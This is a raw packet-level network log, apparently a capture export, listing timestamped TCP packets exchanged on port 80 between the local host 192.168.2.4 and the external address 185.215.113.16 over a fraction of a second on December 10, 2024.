Dec 10, 2024 00:42:39.365611076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.366434097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.366529942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.366579056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.367513895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.367582083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.367631912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.368629932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.368707895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.368748903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.369787931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.369873047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.370007038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.370049000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.370846033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.370891094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.370944023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.371066093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.371876955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.371946096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.371995926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.372981071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.373111010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.373171091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.374105930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.374200106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.374244928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.375204086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.375257015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.375291109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.375328064 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.376272917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.376329899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.376341105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.376377106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.377363920 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.377412081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.377485991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.377557039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.378496885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.378545046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.378571987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.378634930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.379580021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.379704952 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.379755020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.380738020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.380836964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.380888939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.381751060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.381872892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.381915092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.382859945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.382916927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.382955074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.382997036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.384001017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.384083033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.384087086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.384116888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.385036945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.385091066 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.385126114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.385164976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.386158943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.386282921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.386331081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.387273073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.387366056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.387413025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.388323069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.388369083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.388437986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.389425039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.389472008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.389520884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.390556097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.390599966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.390608072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.390647888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.391635895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.391743898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.391793966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.392663002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.395378113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.495281935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.495301008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.495471954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.495624065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.495673895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.495680094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.495709896 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.496716976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.496849060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.496896029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.497823000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.497903109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.497947931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.531264067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.531384945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.531555891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.531640053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.531688929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.531871080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.531985044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.532028913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.532982111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.533122063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.533169985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.534063101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.534185886 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.534233093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.535176039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.535227060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.535248041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.535350084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.536303997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.536350012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.536390066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.536431074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.537358046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.537400961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.537467957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.537513018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.538451910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.538497925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.538568974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.538613081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.539551020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.539705992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.539750099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.540653944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.540721893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.540766001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.541774035 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.541820049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.541842937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.542829990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.542876005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.542937040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.543045998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.543930054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.544044971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.544090033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.545073986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.545214891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.545260906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.546132088 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.546176910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.546207905 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.547056913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.547236919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.547277927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.547348022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.547393084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.548320055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.548362970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.548398972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.548439980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.549401999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.549448967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.549490929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.549535990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.550529957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.550579071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.550620079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.550664902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.551610947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.551712990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.551753998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.552711010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.552830935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.552880049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.553807020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.553869009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.553879023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.555011988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.555058002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.555145979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.556111097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.556159019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.556200981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.556241989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.557193041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.557291031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.557332039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.558204889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.558293104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.558337927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.559267044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.559403896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.559448957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.560364962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.560430050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.560481071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.561461926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.561517000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.561595917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.562596083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.562644958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.562664032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.562701941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.563656092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.563878059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.563922882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.564734936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.564850092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.564898968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.565839052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.565884113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.565952063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.566952944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.566992998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.567063093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.568025112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.568067074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.568156958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.568202972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.569120884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.569267988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.569308996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.570235014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.570311069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.570359945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.571341991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.571441889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.571487904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.572402954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.572448969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.572505951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.573518991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.573559999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.573623896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.574593067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.574637890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.574733973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.574779034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.575680971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.575761080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.575804949 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.576802015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.576915026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.576957941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.577891111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.577935934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.577971935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.578978062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.579025030 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.579049110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.579710960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.580104113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.580163956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.580199957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.580235004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.581172943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.581235886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.581315994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.581362009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.582264900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.582309008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.582364082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.582412004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.583353996 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.583396912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.583502054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.583550930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.584458113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.584507942 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.584525108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.584563017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.687635899 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.687716007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.687804937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.687855959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.688222885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.688275099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.688301086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.688384056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.689035892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.689101934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.689132929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.689177036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.690155029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.690201998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.690232038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.690278053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.723365068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.723433971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.723443031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.723484039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.723898888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.723951101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.723982096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.724076986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.724721909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.724766970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.724852085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.724896908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.725832939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.725879908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.725909948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.725971937 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.726910114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.726957083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.727051020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.727094889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.728013992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.728056908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.728080034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.728120089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.729130030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.729176998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.729223967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.729266882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.730195045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.730247021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.730262041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.730309963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.731283903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.731328011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.731359005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.731403112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.732395887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.732438087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.732497931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.732546091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.733485937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.733551025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.733587980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.733635902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.734579086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.734625101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.734652996 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.734697104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.735732079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.735778093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.735810041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.735847950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.736769915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.736816883 CET	49759	80	192.168.2.4	185.215.113.16
